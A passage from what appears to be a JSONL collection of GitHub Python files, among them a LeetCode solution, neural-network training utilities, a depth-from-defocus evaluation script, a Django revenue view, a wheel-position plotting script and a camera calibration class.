np.std(f)\n \n \n# 乱数の個数nを変化させてリストに追加する。\nfor i in range(n):\n x = i + 1\n # 100エポックごとに進捗を表示させたい場合は以下を表示する\n if x % 100 == 0:\n print(\"We are at:\" + str(x))\n # リストに順次乱数の個数nに対する平均値と標準偏差を追加する。\n # returner()関数はタプルで平均と標準偏差を順に返すためaveとstdでそれぞれ要素を指定する。\n ave_list.append(returner(x)[0])\n std_list.append(returner(x)[1])\n \n# 乱数の個数をプロットするためのリスト\nX = []\nfor i in range(n):\n x = i\n X.append(x)\n \n# 標準偏差の散布図の描画\nplt.scatter(X, ave_list, s=10)\nplt.xlabel(\"Number of random numbers\")\nplt.ylabel(\"Standard deviation\")\nplt.grid(True)\nplt.show()\n# 平均値の散布図の描画\nplt.scatter(X, std_list, s=10)\nplt.xlabel(\"Number of random numbers\")\nplt.ylabel(\"Average\")\nplt.grid(True)\nplt.show()\n","repo_name":"chikisam999/GazouKougaku","sub_path":"gazoukougaku4.py","file_name":"gazoukougaku4.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32161307605","text":"# Question: https://leetcode.com/explore/challenge/card/may-leetcoding-challenge/537/week-4-may-22nd-may-28th/3337/\n\n\"\"\"\nGiven a string, sort it in decreasing order based on the frequency of characters.\n\nExample 1:\n Input: \"tree\"\n Output: \"eert\"\n Explanation:\n 'e' appears twice while 'r' and 't' both appear once.\n So 'e' must appear before both 'r' and 't'. Therefore \"eetr\" is also a valid answer.\n\nExample 2:\n Input: \"cccaaa\"\n Output: \"cccaaa\"\n Explanation:\n Both 'c' and 'a' appear three times, so \"aaaccc\" is also a valid answer.\n Note that \"cacaca\" is incorrect, as the same characters must be together.\n\nExample 3:\n Input: \"Aabb\"\n Output: \"bbAa\"\n Explanation:\n \"bbaA\" is also a valid answer, but \"Aabb\" is incorrect.\n Note that 'A' and 'a' are treated as two different characters.\n\"\"\"\n\nfrom collections import Counter\nfrom operator import itemgetter\n\nclass Solution:\n def frequencySort(self, s): # frequencySort(self, s: str) -> str\n # Input = 'tree'\n\n c = Counter(s)\n # Returns Counter({'e': 2, 't': 1, 'r': 1})\n\n c_keys = list(c.keys()) # List which stores keys from the Counter(s)\n # Returns ['e', 't', 'r']\n \n c_values = list(c.values()) # List which stores values from the Counter(s)\n # Returns [2,1,1]\n\n # Sorts the zipped list, on the basis of frequency of characters, and then reverses it\n s_sorted = sorted(zip(c_keys, c_values), key = itemgetter(1), reverse=True)\n # Returns [('e', 2), ('t', 1), ('r', 1)]\n\n # Creates a new list which stores each character whose length is equal to its frequency \n s_joined = list(map(lambda i: i[0]*i[1], s_sorted))\n # Returns ['ee', 't', 'r']\n \n return ''.join(s_joined)\n # Returns 'eetr'\n\ninputs = ['tree', 'cccaaa', 'Aabb']\noutputs = [\n ['eetr', 'eert'],\n ['cccaaa', 'aaaccc'],\n ['bbAa', 'bbaA']\n]\n\nS = Solution()\nfor i in range(len(inputs)):\n if S.frequencySort(inputs[i]) in outputs[i]:\n print('Case {} passed'.format(i+1))\n else:\n print('Case {} failed'.format(i+1))\n","repo_name":"patel-himanshu/leetcode-problems","sub_path":"2020 - May LeetCoding Challenge/451-sort-characters-by-frequency.py","file_name":"451-sort-characters-by-frequency.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34969242662","text":"from argparse import ArgumentParser, Namespace\nimport pylicense.repos as repos\n\n\ndef dispatch(parser: ArgumentParser, cli_args: Namespace):\n if cli_args.inputfile is None:\n parser.print_help()\n exit(1)\n\n if cli_args.repository == \"pypi\":\n r_parser = repos.PyPIRepoParser()\n elif cli_args.repository == \"anaconda\":\n r_parser = repos.AnacondaRepoParser()\n elif cli_args.repository == \"conda-forge\":\n r_parser = repos.CondaForgeRepoParser()\n\n pkgs_info = r_parser.from_io(cli_args.inputfile)\n if cli_args.output_format == \"csv\":\n print(r_parser.as_csv(pkgs_info, separator=cli_args.csv_separator))\n elif cli_args.output_format == \"markdown\":\n print(r_parser.as_markdown(pkgs_info))\n elif cli_args.output_format == \"json\":\n print(r_parser.as_json(pkgs_info))","repo_name":"dotcs/pylicense","sub_path":"pylicense/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"75210524624","text":"\"\"\"Utilities for nolearn's neural net\"\"\"\n\nimport numpy as np\n\n\nclass EarlyStopping(object):\n def __init__(self, patience=100):\n self.patience = patience\n self.best_valid = np.inf\n self.best_valid_epoch = 0\n self.best_weights = None\n\n def __call__(self, nn, train_history):\n current_valid = train_history[-1]['valid_loss']\n current_train = train_history[-1]['train_loss']\n current_epoch = train_history[-1]['epoch']\n\n # Ignore if training loss is greater than valid loss\n if current_train > current_valid:\n return\n\n if current_valid < self.best_valid:\n self.best_valid = current_valid\n self.best_valid_epoch = current_epoch\n self.best_weights = [w.get_value() for w in nn.get_all_params()]\n elif self.best_valid_epoch + self.patience < current_epoch:\n print('Early stopping.')\n print('Best valid loss was {:.6f} at epoch {}.'.format(\n self.best_valid, self.best_valid_epoch))\n nn.load_weights_from(self.best_weights)\n raise StopIteration()\n\n\nclass StepDecay(object):\n def __init__(self, name, start=0.03, stop=0.001, delay=0):\n self.name = name\n self.delay = delay\n self.start, self.stop = start, stop\n self.ls = None\n\n def __call__(self, net, train_history):\n if self.ls is None:\n self.ls = np.linspace(self.start, self.stop, net.max_epochs - self.delay)\n\n epoch = train_history[-1]['epoch'] - self.delay\n if epoch >= 0:\n new_value = float32(self.ls[epoch - 1])\n getattr(net, self.name).set_value(new_value)\n\n\ndef float32(x):\n return np.cast['float32'](x)\n","repo_name":"felixlaumon/kaggle-plankton","sub_path":"plankton/net_utils.py","file_name":"net_utils.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5931582908","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torchvision import transforms, utils\nfrom arch import dofNet_arch3,dofNet_arch4\n\nimport numpy as np\nimport importlib\nimport util_func\nimport argparse\nfrom dataloaders import DDFF12,focalblender,NYU_blurred,DSLR\n\nparser = argparse.ArgumentParser(description='camIndDefocus')\nparser.add_argument('--datapath', default='C:\\\\Users\\\\***\\\\focalstacks\\\\datasets\\\\defocusnet_N1\\\\', help='blender data path')\n# parser.add_argument('--datapath', default=\"C:\\\\Users\\\\***\\\\focalstacks\\\\datasets\\\\mediumN1-10_test_remapped\\\\\", help='blender data path')\n# parser.add_argument('--datapath', default=\"C://Users//***//focalstacks//datasets//mediumN1//\", help='blender data path')\n# parser.add_argument('--datapath', default='C:\\\\Users\\\\***\\\\data\\\\DSLR\\\\dfd_indoor\\\\dfd_dataset_indoor_N2_8\\\\', help='blender data path')\n# parser.add_argument('--datapath', default='C:\\\\Users\\\\***\\\\data\\\\nyu_depth\\\\noborders\\\\', help='blender data path')\nparser.add_argument('--kcamfile', default=None, help='blender data path')\n# parser.add_argument('--ddffpth', default='C:\\\\Users\\\\***\\\\focalstacks\\\\datasets\\\\my_dff_trainVal.h5', help='blender data path')\nparser.add_argument('--dataset', default='defocusnet', help='dataset name')\nparser.add_argument('--datanum', default='9', help='dataset number. Only applicable for NYU depth')\nparser.add_argument('--bs', type=int,default=1, help='training batch size')\nparser.add_argument('--depthscale', type=float,default=1.,help='divide all depths by this value')\nparser.add_argument('--checkpt', default=r'C:\\Users\\***\\models\\camind\\camind_defocusnet_bs_12_depth_1_dweight_1.0_bweight_1.0\\3269.pth', help='path to the saved model')\nparser.add_argument('--s2limits', nargs=\"*\", default=[0.1,3.0], help='the interval of depth where the errors are calculated')\nparser.add_argument('--blurclip', type=float,default=6.5,help='Clip blur by this value : only applicable for camind model. Default=10')\nparser.add_argument('--camind', type=bool,default=True, help='True: use camera independent model. False: use defocusnet model')\nparser.add_argument('--aif', type=bool,default=False, help='True: Train with the AiF images. False: Train with blurred images')\nparser.add_argument('--out_depth', type=int,default=1, help='True: use camera independent model. False: use defocusnet model')\nparser.add_argument('--kcamscale', type=float,default=30,help='Scale up everything after blur prediction and before they are sent to the depth prediction network')\nargs = parser.parse_args()\n\n'''\nload model\n'''\n#GPU or CPU\ndevice_comp = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nif(args.out_depth==1):\n ch_inp_num = 3\n ch_out_num = 1\n model = dofNet_arch4.AENet(ch_inp_num, 1, 16, flag_step2=True)\n model = model.to(device_comp)\n model_params = model.parameters()\nelif(args.out_depth==0):\n ch_inp_num = 3\n ch_out_num = 1\n model = dofNet_arch3.AENet(ch_inp_num, 1, 16, flag_step2=True)\n model = model.to(device_comp)\n model_params = model.parameters()\n\n# loading weights of the first step\nif args.checkpt:\n print('loading model....')\n print('model path :'+args.checkpt)\n pretrained_dict = torch.load(args.checkpt)\n model_dict = model.state_dict()\n for param_tensor in model_dict:\n for param_pre in pretrained_dict:\n if param_tensor == param_pre:\n model_dict.update({param_tensor: pretrained_dict[param_pre]})\n model.load_state_dict(model_dict)\n\n #load the required dataset\nif(args.dataset=='blender'):\n print('eval blender')\n if(args.kcamfile):\n kcampath=args.datapath+args.kcamfile\n else:\n kcampath=None\n loaders, total_steps = focalblender.load_data(args.datapath,blur=1,aif=args.aif,train_split=0.8,fstack=0,WORKERS_NUM=0,\n BATCH_SIZE=args.bs,FOCUS_DIST=[0.1,.15,.3,0.7,1.5,100000],REQ_F_IDX=[0,1,2,3,4],MAX_DPT=1.0,\n blurclip=args.blurclip,dataset=args.dataset,out_depth=args.out_depth,\n kcampath=kcampath)\nelif(args.dataset=='ddff'):\n DDFF12_train = DDFF12.DDFF12Loader(args.ddffpth, stack_key=\"stack_train\", disp_key=\"disp_train\", n_stack=10,\n min_disp=0.02, max_disp=0.28,fstack=0,idx_req=[9])\n DDFF12_val = DDFF12.DDFF12Loader(args.ddffpth, stack_key=\"stack_val\", disp_key=\"disp_val\", n_stack=10,\n min_disp=0.02, max_disp=0.28, b_test=False,fstack=0,idx_req=[6,5,4,3,2,1,0])\n DDFF12_train, DDFF12_val = [DDFF12_train], [DDFF12_val]\n\n dataset_train = torch.utils.data.ConcatDataset(DDFF12_train)\n dataset_val = torch.utils.data.ConcatDataset(DDFF12_val) # we use the model perform better on DDFF12_val\n\n TrainImgLoader = torch.utils.data.DataLoader(dataset=dataset_train, num_workers=0, batch_size=1, shuffle=True, drop_last=True)\n ValImgLoader = torch.utils.data.DataLoader(dataset=dataset_val, num_workers=0, batch_size=1, shuffle=False, drop_last=True)\nelif(args.dataset=='defocusnet'):\n print('Getting defocusnet data...')\n loaders, total_steps = focalblender.load_data(args.datapath,blur=1,aif=0,train_split=0.8,fstack=0,WORKERS_NUM=0,\n BATCH_SIZE=args.bs,FOCUS_DIST=[0.1,.15,.3,0.7,1.5],REQ_F_IDX=[0,1,2,3,4],MAX_DPT=1.0,blurclip=1.0,dataset=args.dataset,\n out_depth=args.out_depth)\nelif(args.dataset=='nyu'):\n print('Getting NUY data...')\n datanum=args.datanum\n loaders, total_steps = NYU_blurred.load_data(datapath=args.datapath,datanum=datanum,blur=1,fstack=0,WORKERS_NUM=0,\n BATCH_SIZE=1,blurclip=args.blurclip,out_depth=args.out_depth)\nelif(args.dataset==\"DSLR\"):\n loaders=DSLR.load_data(datapath=args.datapath,train_n=10,blur=1,WORKERS_NUM=0,\n BATCH_SIZE=1,out_depth=args.out_depth)\n \n# testing\nfor st_iter, sample_batch in enumerate(loaders[0]):\n if(args.dataset==\"nyu\"):\n X=sample_batch['rgb'].float().to(device_comp)\n depth=sample_batch['depth'].float().to(device_comp)\n blur=sample_batch['blur'].float().to(device_comp)\n depth=torch.unsqueeze(depth,dim=1)\n blur=torch.unsqueeze(blur,dim=1)\n stacknum=X.shape\n else:\n # Setting up input and output data\n X = sample_batch['input'][:,0,:,:,:].float().to(device_comp)\n depth=sample_batch['depth'].float().to(device_comp)\n blur=sample_batch['blur'].float().to(device_comp)\n focus_distance=sample_batch['fdist']\n focus_distance=torch.unsqueeze(focus_distance,dim=2).unsqueeze(dim=3)\n focus_distance=torch.repeat_interleave(focus_distance,depth.shape[2],dim=2).repeat_interleave(depth.shape[3],dim=3)\n focus_distance=focus_distance.to(device_comp)\n\n if(len(args.s2limits)==2):\n if(args.out_depth==1):\n mask=(depth>args.s2limits[0])*(depthargs.s2limits[0])*((focus_distance*depth)0])))\n print('corrected blur:'+str(torch.mean(corrected_blur[mask>0])))\n print('pred depth:'+str(torch.mean(pred_depth[mask>0])))\n print('GT depth:'+str(torch.mean((depth)[mask>0])))\n break\n\nimport matplotlib.pyplot as plt\npred_depth_=pred_depth\npred_depth_[mask<=0]=0\npred=pred_depth_.detach().cpu().numpy().squeeze()\nplt.imshow(pred)\nplt.show()\n\nd=depth.detach().cpu().numpy().squeeze()\nplt.imshow(d)\nplt.show()\n\nb=blur.detach().cpu().numpy().squeeze()\nplt.imshow(b)\nplt.show()\n\npb=pred_blur.detach().cpu().numpy().squeeze()\nplt.imshow(pb)\nplt.show()\n\ndef main():\n if(args.dataset=='blender' or args.dataset=='defocusnet' or args.dataset=='nyu'): \n print('evaluating on blender or defocusnet') \n depthMSE,valueMSE,blurloss,meanblur,gtmeanblur,minblur,maxblur=util_func.eval(model,loaders[1],args,device_comp)\n #util_func.kcamwise_blur(model,loaders[1],args,device_comp)\n elif(args.dataset=='DSLR'):\n fd_in=1.0\n for kcam_in in [1.3]:\n for f_in in [6]:\n f_in=f_in*1e-3\n for fd_in in [1.0]:\n print('***** fd = '+str(fd_in))\n depthMSE,valueMSE,blurloss,meanblur,gtmeanblur,minblur,maxblur=util_func.eval(model,loaders[1],args,device_comp,calc_distmse=False,\n kcam_in=kcam_in,f_in=f_in,fd_in=fd_in)\n print('s2 loss2: MSE: '+str(depthMSE)+\" RMSE:\"+str(depthMSE**0.5))\n elif(args.dataset=='ddff'):\n print('DDFF dataset Evaluation')\n kcam=5.0\n for kcam in [0.1,0.5,0.8,11,12,13,14,15,16,17,18]:\n print('kcam=%2.2f'%(kcam))\n depthMSE,valueMSE,blurloss,meanblur,gtmeanblur,minblur,maxblur=util_func.eval(TrainImgLoader,model_info,args.depthscale,args.fscale,args.s2limits,\n dataset=args.dataset,camind=args.camind,aif=args.aif,kcam=kcam,f=9.5e-3)\n print('MSE:%2.4f'%(s2loss2))\n \n print('s2 loss2: MSE: '+str(depthMSE)+\" RMSE:\"+str(depthMSE**0.5))\n print('blur loss = '+str(blurloss))\n print('mean blur = '+str(meanblur)) \n print('min blur = '+str(minblur))\n print('max blur = '+str(maxblur)) \n print('gt mean blur = '+str(gtmeanblur)) \n print('__________________')\n \nif __name__ == \"__main__\":\n main()\n\n'''\n#plot MSE vs dist for various S1 values\nimport matplotlib.pyplot as plt\ns2=[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8]\nmse1=[0.026,0.040,0.053,0.058,0.067,0.087,0.121,0.171,0.239,0.319,0.422,0.538,0.685,0.855,1.040,1.253,1.489,1.709]\nmse2=[0.050,0.028,0.026,0.032,0.045,0.067,0.105,0.157,0.229,0.312,0.418,0.541,0.690,0.857,1.049,1.270,1.505,1.707]\nmse3=[0.126,0.089,0.049,0.022,0.013,0.018,0.040,0.077,0.133,0.199,0.291,0.404,0.534,0.686,0.861,1.064,1.288,1.545]\nmse4=[0.114,0.099,0.073,0.041,0.023,0.018,0.028,0.054,0.099,0.155,0.235,0.336,0.453,0.592,0.750,0.941,1.153,1.458]\nmse5=[0.128,0.114,0.092,0.060,0.035,0.024,0.026,0.043,0.078,0.126,0.197,0.288,0.393,0.519,0.667,0.842,1.044,1.384]\n\nplt.plot(s2,mse1,'-b',label='s1=0.1',marker=\".\", markersize=7)\nplt.plot(s2,mse2,'-r',label='s1=0.15',marker=\"*\", markersize=7)\nplt.plot(s2,mse3,'-g',label='s1=0.3',marker=\"1\", markersize=7)\nplt.plot(s2,mse4,'-m',label='s1=0.7',marker=\"d\", markersize=7)\nplt.plot(s2,mse5,'-c',label='s1=1.5',marker=\"+\", markersize=7)\nplt.legend(loc=\"upper left\")\nplt.title('MSE vs distance')\nplt.xlabel('distance(s2)-m')\nplt.ylabel('MSE')\nplt.savefig('s2vsmse.png', dpi=500)\nplt.show()\n'''\n\n'''\nimport util_func\n\np=3.1e-3/256\nN=2\nf=6e-3\ns2range=[0.1,2.0]\ns1range=[0.1,2.0]\nblur_thres=3.0\nutil_func.get_workable_s1s2ranges(p,N,f,s2range,s1range,blur_thres,imgratio=1)\n'''\n\n'''\nEvaluating focal length variation data\nf=3mm\ns1=1.5\ns2 : 0.15 - 1.0\nMSE\ncamind GTkcam:0.0516 kcamestGT:0.0500 kcamestDVF:0.0511\nno camind:0.1005\ndefocus: 0.1932\naif:0.0996\n\nf=4mm\ns1=1.5\ns2: 0.15-1.0\nMSE\ncamind GTkcam:0.0478 kcamestGT:0.0422 kcamestDVF:0.0449\nno camind: 0.0530\ndefocus: 0.1898\naif: 0.0819\n\nf=5mm\ns1=1.5\ns2: 0.3-1.0\nMSE\ncamind GTkcam:0.0547 kcamestGT:0.0488 kcamestDVF:0.0511\ndefocus : 0.1879\naif: 0.0827\n\nf=6mm\ns1=1.5\ns2: 0.5 - 1.0\nMSE\ncamind GTkcam:0.0620 kcamestGT:0.0604 kcamestDVF:0.0585\ndefocus : 0.0548\naif:0.1008\n'''\n\n'''\ndist wise error \ns1=1.5m\nwith estimatef kcam\nf=3mm\n0.053,0.062,0.043,0.025,0.018,0.031,0.052,0.080,0.134,0.204,0.302,0.401,0.500,0.614,0.786,0.952,1.122,1.233\nf=4mm\n0.057,0.051,0.053,0.058,0.035,0.032,0.035,0.046,0.066,0.118,0.218,0.289,0.363,0.509,0.592,0.770,0.886,1.061\nf=5mm\n0.055,0.024,0.031,0.051,0.057,0.048,0.036,0.059,0.100,0.158,0.165,0.243,0.250,0.391,0.687,0.749,0.746,0.903\nf=6mm\n0.107,0.056,0.054,0.037,0.065,0.048,0.085,0.107,0.122,0.153,0.279,0.329,0.392,0.629,0.762,0.577,0.808,1.116\n'''\n'''\nimport matplotlib.pyplot as plt\ns2=[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8]\n#DVF estimated kcam\nmse1=[0.053,0.062,0.043,0.025,0.018,0.031,0.052,0.080,0.134,0.204,0.302,0.401,0.500,0.614,0.786,0.952,1.122,1.233]\nmse2=[0.057,0.051,0.053,0.058,0.035,0.032,0.035,0.046,0.066,0.118,0.218,0.289,0.363,0.509,0.592,0.770,0.886,1.061]\nmse3=[0.055,0.024,0.031,0.051,0.057,0.048,0.036,0.059,0.100,0.158,0.165,0.243,0.250,0.391,0.687,0.749,0.746,0.903]\nmse4=[0.107,0.056,0.054,0.037,0.065,0.048,0.085,0.107,0.122,0.153,0.279,0.329,0.392,0.629,0.762,0.577,0.808,1.116]\n\n#GT kcams\nmse1=[0.185,0.102,0.081,0.055,0.084,0.044,0.102,0.107,0.096,0.131,0.228,0.290,0.347,0.553,0.730,0.527,0.850,0.815]\nmse2=[0.068,0.031,0.031,0.054,0.066,0.050,0.037,0.055,0.097,0.143,0.164,0.256,0.259,0.412,0.709,0.750,0.749,0.842]\nmse3=[0.069,0.052,0.057,0.060,0.041,0.033,0.033,0.043,0.063,0.109,0.209,0.279,0.360,0.500,0.580,0.732,0.856,1.009]\nmse4=[0.061,0.071,0.051,0.032,0.022,0.028,0.042,0.066,0.111,0.172,0.266,0.361,0.456,0.554,0.723,0.874,1.021,1.118]\n\nplt.plot(s2,mse1,'-b',label='f=3mm',marker=\".\", markersize=7)\nplt.plot(s2,mse2,'-r',label='f=4mm',marker=\"*\", markersize=7)\nplt.plot(s2,mse3,'-g',label='f=5mm',marker=\"1\", markersize=7)\nplt.plot(s2,mse4,'-m',label='f=6mm',marker=\"d\", markersize=7)\nplt.legend(loc=\"upper left\")\nplt.title('MSE vs distance')\nplt.xlabel('distance(s2)-m')\nplt.ylabel('MSE')\nplt.savefig('s2vsmse_f_DVFkcam.png', dpi=500)\nplt.show()\n'''\n\n\n\n\n\n\n\n\n","repo_name":"sleekEagle/defocus_camind","sub_path":"source/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":14754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74229303825","text":"from django.db.models import Sum, OuterRef, Subquery\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\n\nfrom spend.models import SpendStatistic\nfrom .models import RevenueStatistic\nfrom .serializers import RevenueRetrieveSerializer, RevenueSerializer\n\n\nclass RevenueStatisticsView(APIView):\n def get(self, request):\n spend_subquery = SpendStatistic.objects.filter(revenuestatistic=OuterRef('pk')).values('revenuestatistic')\n\n total_spend_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"spend\"))\n .values(\"total\")[:1]\n )\n\n total_impressions_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"impressions\"))\n .values(\"total\")[:1]\n )\n\n total_clicks_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"clicks\"))\n .values(\"total\")[:1]\n )\n\n total_conversions_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"conversion\"))\n .values(\"total\")[:1]\n )\n\n queryset = RevenueStatistic.objects.annotate(\n total_revenue=Sum(\"revenue\"),\n total_spend=total_spend_subquery,\n total_impressions=total_impressions_subquery,\n total_clicks=total_clicks_subquery,\n total_conversions=total_conversions_subquery,\n )\n\n truncated_data = []\n for item in queryset:\n item[\"date\"] = item[\"date\"].strftime(\"%Y-%m-%d\")\n truncated_data.append(item)\n\n serializer = RevenueRetrieveSerializer(truncated_data, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def post(self, request):\n serializer = RevenueSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"volodymyr-komarnyckyi/test_task","sub_path":"revenue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32277106659","text":"\"\"\"\nRE spits out ticks [-512, 512] which is a full turn of the wheel\nI linearly rescale it to [-180, 180] # wheel degrees\nThe screen \"wants\" a positionX from [-1, 1] where 0 is the center of the screen\nI I then divide all positions as they are coming by a GainFactor\nGainFactor = 1 / (mm_per_deg * UserDefinedGain)\nUserDefinedGain = 4.0\nmm_per_deg = (2 * Pi * WheelRadius) / 360\nwhere WheelRadius = 31mm\n\nNow that I have the transformation done as if the stimulus would start from the center I need to\noffset it by the InitPosition of the stimulus (either -35 or 35)\nThen for \"safety\" I pass an unwrapping function for the cases when the stimulus ight go over the\nedge of the screen\nI do this in the same go\n((InitPosition + out_value) + 180) % 360 - 180 and that is what is sent to the screen...\n\n((-35 + (1 / (1 / ((math.pi * 2 * 31) / 360) * 4))) + 180) % 360 -180\n\"\"\"\nimport math\nimport matplotlib.pyplot as plt\n\n\nWHEEL_RADIUS = 31\nUSER_DEFINED_GAIN = 4.0\nMM_PER_DEG = (2 * math.pi * WHEEL_RADIUS) / 360\nGAIN_FACTOR = 1 / (MM_PER_DEG * USER_DEFINED_GAIN)\n\n\ndef get_scale_shift(from_min, from_max, to_min, to_max):\n scale = (to_max - to_min) / (from_max - from_min)\n shift = -from_min * scale + to_min\n return scale, shift\n\n\ndef rescale(input, from_min, from_max, to_min, to_max):\n scale, shift = get_scale_shift(from_min, from_max, to_min, to_max)\n try:\n iter(input)\n except TypeError:\n input = [input]\n\n for i in input:\n yield i * scale + shift\n\n\nRE_TICKS = range(-512, 512)\nRE_TICK_DEG_VALUE = list(rescale(RE_TICKS, -512, 512, -180, 180))\n\n\ndef pos_on_screen(pos, init_pos):\n try:\n iter(pos)\n except TypeError:\n pos = [pos]\n\n for p in pos:\n yield (((p / GAIN_FACTOR) + init_pos) + 180) % 360 - 180\n\n\nrelative_wheel_degrees = range(-20, 21) # RE_TICK_DEG_VALUE\nabsolute_screen_deg_form_left_stim = list(pos_on_screen(relative_wheel_degrees, -35))\nabsolute_screen_deg_form_right_stim = list(pos_on_screen(relative_wheel_degrees, 35))\n\nax = plt.subplot(111)\nax.plot(\n relative_wheel_degrees, absolute_screen_deg_form_left_stim, c=\"b\", ls=\"--\", marker=\".\",\n)\nax.plot(relative_wheel_degrees, absolute_screen_deg_form_right_stim[::-1], \"g.--\")\nax.axhline()\nax.axhline(-35)\nax.axhline(35)\nax.axhline(70, c=\"gray\")\nax.axhline(-70, c=\"gray\")\nax.set_xlabel(f\"Wheel degrees - Gain = {USER_DEFINED_GAIN}\")\nax.set_ylabel(f\"Screen degrees - Gain = {USER_DEFINED_GAIN}\")\n# ax.clear()\nplt.show()\n","repo_name":"int-brain-lab/iblrig","sub_path":"scripts/wheel_positions.py","file_name":"wheel_positions.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"6318727856","text":"import logging\nimport os\nimport time\nimport datetime\n\n__author__ = 'Mark'\n\nimport cv2\nfrom pattern_type import PatternType\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass CameraCalibrator:\n def __init__(self, pattern_type, pattern_dims, image_size):\n if pattern_type is not PatternType.Checkerboard:\n raise NotImplementedError(\"Currently implemented only for checkerboard pattern\")\n\n self.pattern_dims = pattern_dims\n self.image_size = image_size\n\n #Position of calibration points in real world: just a grid on x,y dimensions (z=0)\n self._pattern_object_points = np.zeros((self.pattern_dims[0] * self.pattern_dims[1], 3), np.float32)\n self._pattern_object_points[:, :2] = np.mgrid[0:self.pattern_dims[0], 0: self.pattern_dims[1]].T.reshape(-1, 2)\n\n self.number_of_samples = 0\n self._calibration_object_points = []\n self._calibration_samples = []\n\n # Calibration results:\n self.accuracy = 0\n self.coefficients = []\n self.original_camera_matrix = []\n self.new_camera_matrix = []\n\n self.map_x = np.array([])\n self.map_y = np.array([])\n #self.reverse_map_x = np.array([])\n #self.reverse_map_y = np.array([])\n self.roi = []\n self.alpha = 0\n\n def clear(self):\n self.number_of_samples = 0\n self._calibration_object_points = []\n self._calibration_samples = []\n\n def add_sample(self, pattern_points):\n self._calibration_object_points.append(self._pattern_object_points)\n self._calibration_samples.append(pattern_points)\n self.number_of_samples += 1\n\n def calibrate(self):\n self.accuracy, self.original_camera_matrix, self.coefficients, _, _ = \\\n cv2.calibrateCamera(self._calibration_object_points, self._calibration_samples, self.image_size, None, None)\n logging.info(\"distortion coeffs (k1,k2,p1,p2[,k3[,k4,k5,k6]]) = {}\".format(self.coefficients))\n # Use the same camera_matrix\n self.roi = None\n self.new_camera_matrix = self.original_camera_matrix\n\n def calculate_new_camera_matrix(self, alpha=None, center_principal_point=True):\n logging.debug(\"Calculating new camera matrix.\")\n if alpha is not None:\n self.alpha = alpha\n # Calculate new camera matrix\n self.new_camera_matrix, self.roi = cv2.getOptimalNewCameraMatrix(\n self.original_camera_matrix,\n self.coefficients,\n self.image_size,\n self.alpha,\n self.image_size,\n centerPrincipalPoint=center_principal_point\n )\n logging.debug(\"Calculating new camera matrix - Complete.\")\n\n def generate_maps(self):\n logging.debug(\"Generating maps\")\n logging.debug(\"Generating distortion map\")\n self.map_x, self.map_y = cv2.initUndistortRectifyMap(self.original_camera_matrix, self.coefficients, None,\n self.new_camera_matrix, self.image_size, 5)\n logging.debug(\"Generating distortion map - Complete\")\n #self._generate_reverse_map()\n logging.debug(\"Generating maps - Complete.\")\n\n def save_results(self, additional_string=\"\", csv=True):\n timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y_%m_%d__%H_%M_%S')\n directory = \"results/{}_{}/\".format(timestamp, additional_string)\n if os.path.exists(directory):\n logging.error(\"directory {} already exists. Results not saved.\")\n return\n os.makedirs(directory)\n\n np.save(\"{}dist_coeffs.npy\".format(directory), self.coefficients)\n np.save(\"{}original_camera_matrix.npy\".format(directory), self.original_camera_matrix)\n np.save(\"{}alpha.npy\".format(directory), self.alpha)\n logging.debug(\"Results saved in numpy format\")\n self._save_cvs_results(directory)\n\n logging.info(\"Saving results - Complete.\")\n\n\n def _save_cvs_results(self, directory):\n csv_directory = \"{}csv/\".format(directory)\n os.makedirs(csv_directory)\n\n np.savetxt(\"{}dist_coeffs.csv\".format(csv_directory), self.coefficients, delimiter=\", \")\n np.savetxt(\"{}original_camera_matrix.csv\".format(csv_directory), self.original_camera_matrix, delimiter=\", \")\n np.savetxt(\"{}alpha.csv\".format(csv_directory), [self.alpha], delimiter=\", \")\n\n # np.savetxt(\"{}map_x.csv\".format(csv_directory), self.map_x, delimiter=\", \")\n #np.savetxt(\"{}map_y.csv\".format(csv_directory), self.map_y, delimiter=\", \")\n\n #Maps are originally in floats, but Integer versions are smaller\n np.savetxt(\"{}int_map_x.csv\".format(csv_directory), 